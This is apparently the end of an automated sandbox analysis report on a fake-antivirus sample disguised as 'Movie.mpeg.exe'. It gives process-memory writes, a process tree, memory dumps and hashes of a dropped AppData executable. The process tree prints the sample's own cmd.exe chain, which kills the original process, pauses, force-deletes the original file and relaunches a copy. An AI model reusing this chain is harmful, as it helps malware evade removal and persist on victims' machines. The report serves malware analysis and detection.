PID 1304 wrote to memory of 2532 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\taskkill.exe
PID 1304 wrote to memory of 2532 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\taskkill.exe
PID 1304 wrote to memory of 2532 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\taskkill.exe
PID 1304 wrote to memory of 2532 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\taskkill.exe
PID 1304 wrote to memory of 2668 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 1304 wrote to memory of 2668 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 1304 wrote to memory of 2668 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 1304 wrote to memory of 2668 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE
PID 1304 wrote to memory of 2600 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Admin\AppData\Local\goujfbdq.exe
PID 1304 wrote to memory of 2600 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Admin\AppData\Local\goujfbdq.exe
PID 1304 wrote to memory of 2600 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Admin\AppData\Local\goujfbdq.exe
PID 1304 wrote to memory of 2600 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Admin\AppData\Local\goujfbdq.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /f /pid 1256 & ping -n 3 127.1 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe" & start C:\Users\Admin\AppData\Local\goujfbdq.exe -f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /pid 1256

C:\Windows\SysWOW64\PING.EXE

ping -n 3 127.1

C:\Users\Admin\AppData\Local\goujfbdq.exe

C:\Users\Admin\AppData\Local\goujfbdq.exe -f

Network

N/A

Files

memory/1256-0-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1256-1-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/1256-2-0x0000000000260000-0x0000000000262000-memory.dmp

memory/1256-4-0x0000000001000000-0x00000000010CE000-memory.dmp

\Users\Admin\AppData\Local\goujfbdq.exe

MD5 d0deb2644c9435ea701e88537787ea6e
SHA1 866e47ecd80da89c4f56557659027a3aee897132
SHA256 ad6cd46f373aadad85fab5ecdb4cb4ad7ebd0cbe44c84db5d2a2ee1b54eb5ec3
SHA512 6faac2e1003290bb3a0613ee84d5c76d3c48a4524e97975e9174d6fcfb5a6a48d6648b06ed5a4c10c3349f70efffc6a08a185fdeb0824250ae044b96ef39fcdf

memory/2600-9-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/2600-10-0x0000000000270000-0x0000000000272000-memory.dmp

memory/2600-12-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/2600-13-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/2600-14-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/2600-15-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/2600-16-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/2600-17-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/2600-18-0x0000000001000000-0x00000000010CE000-memory.dmp

memory/2600-19-0x0000000001000000-0x00000000010CE000-memory.dmp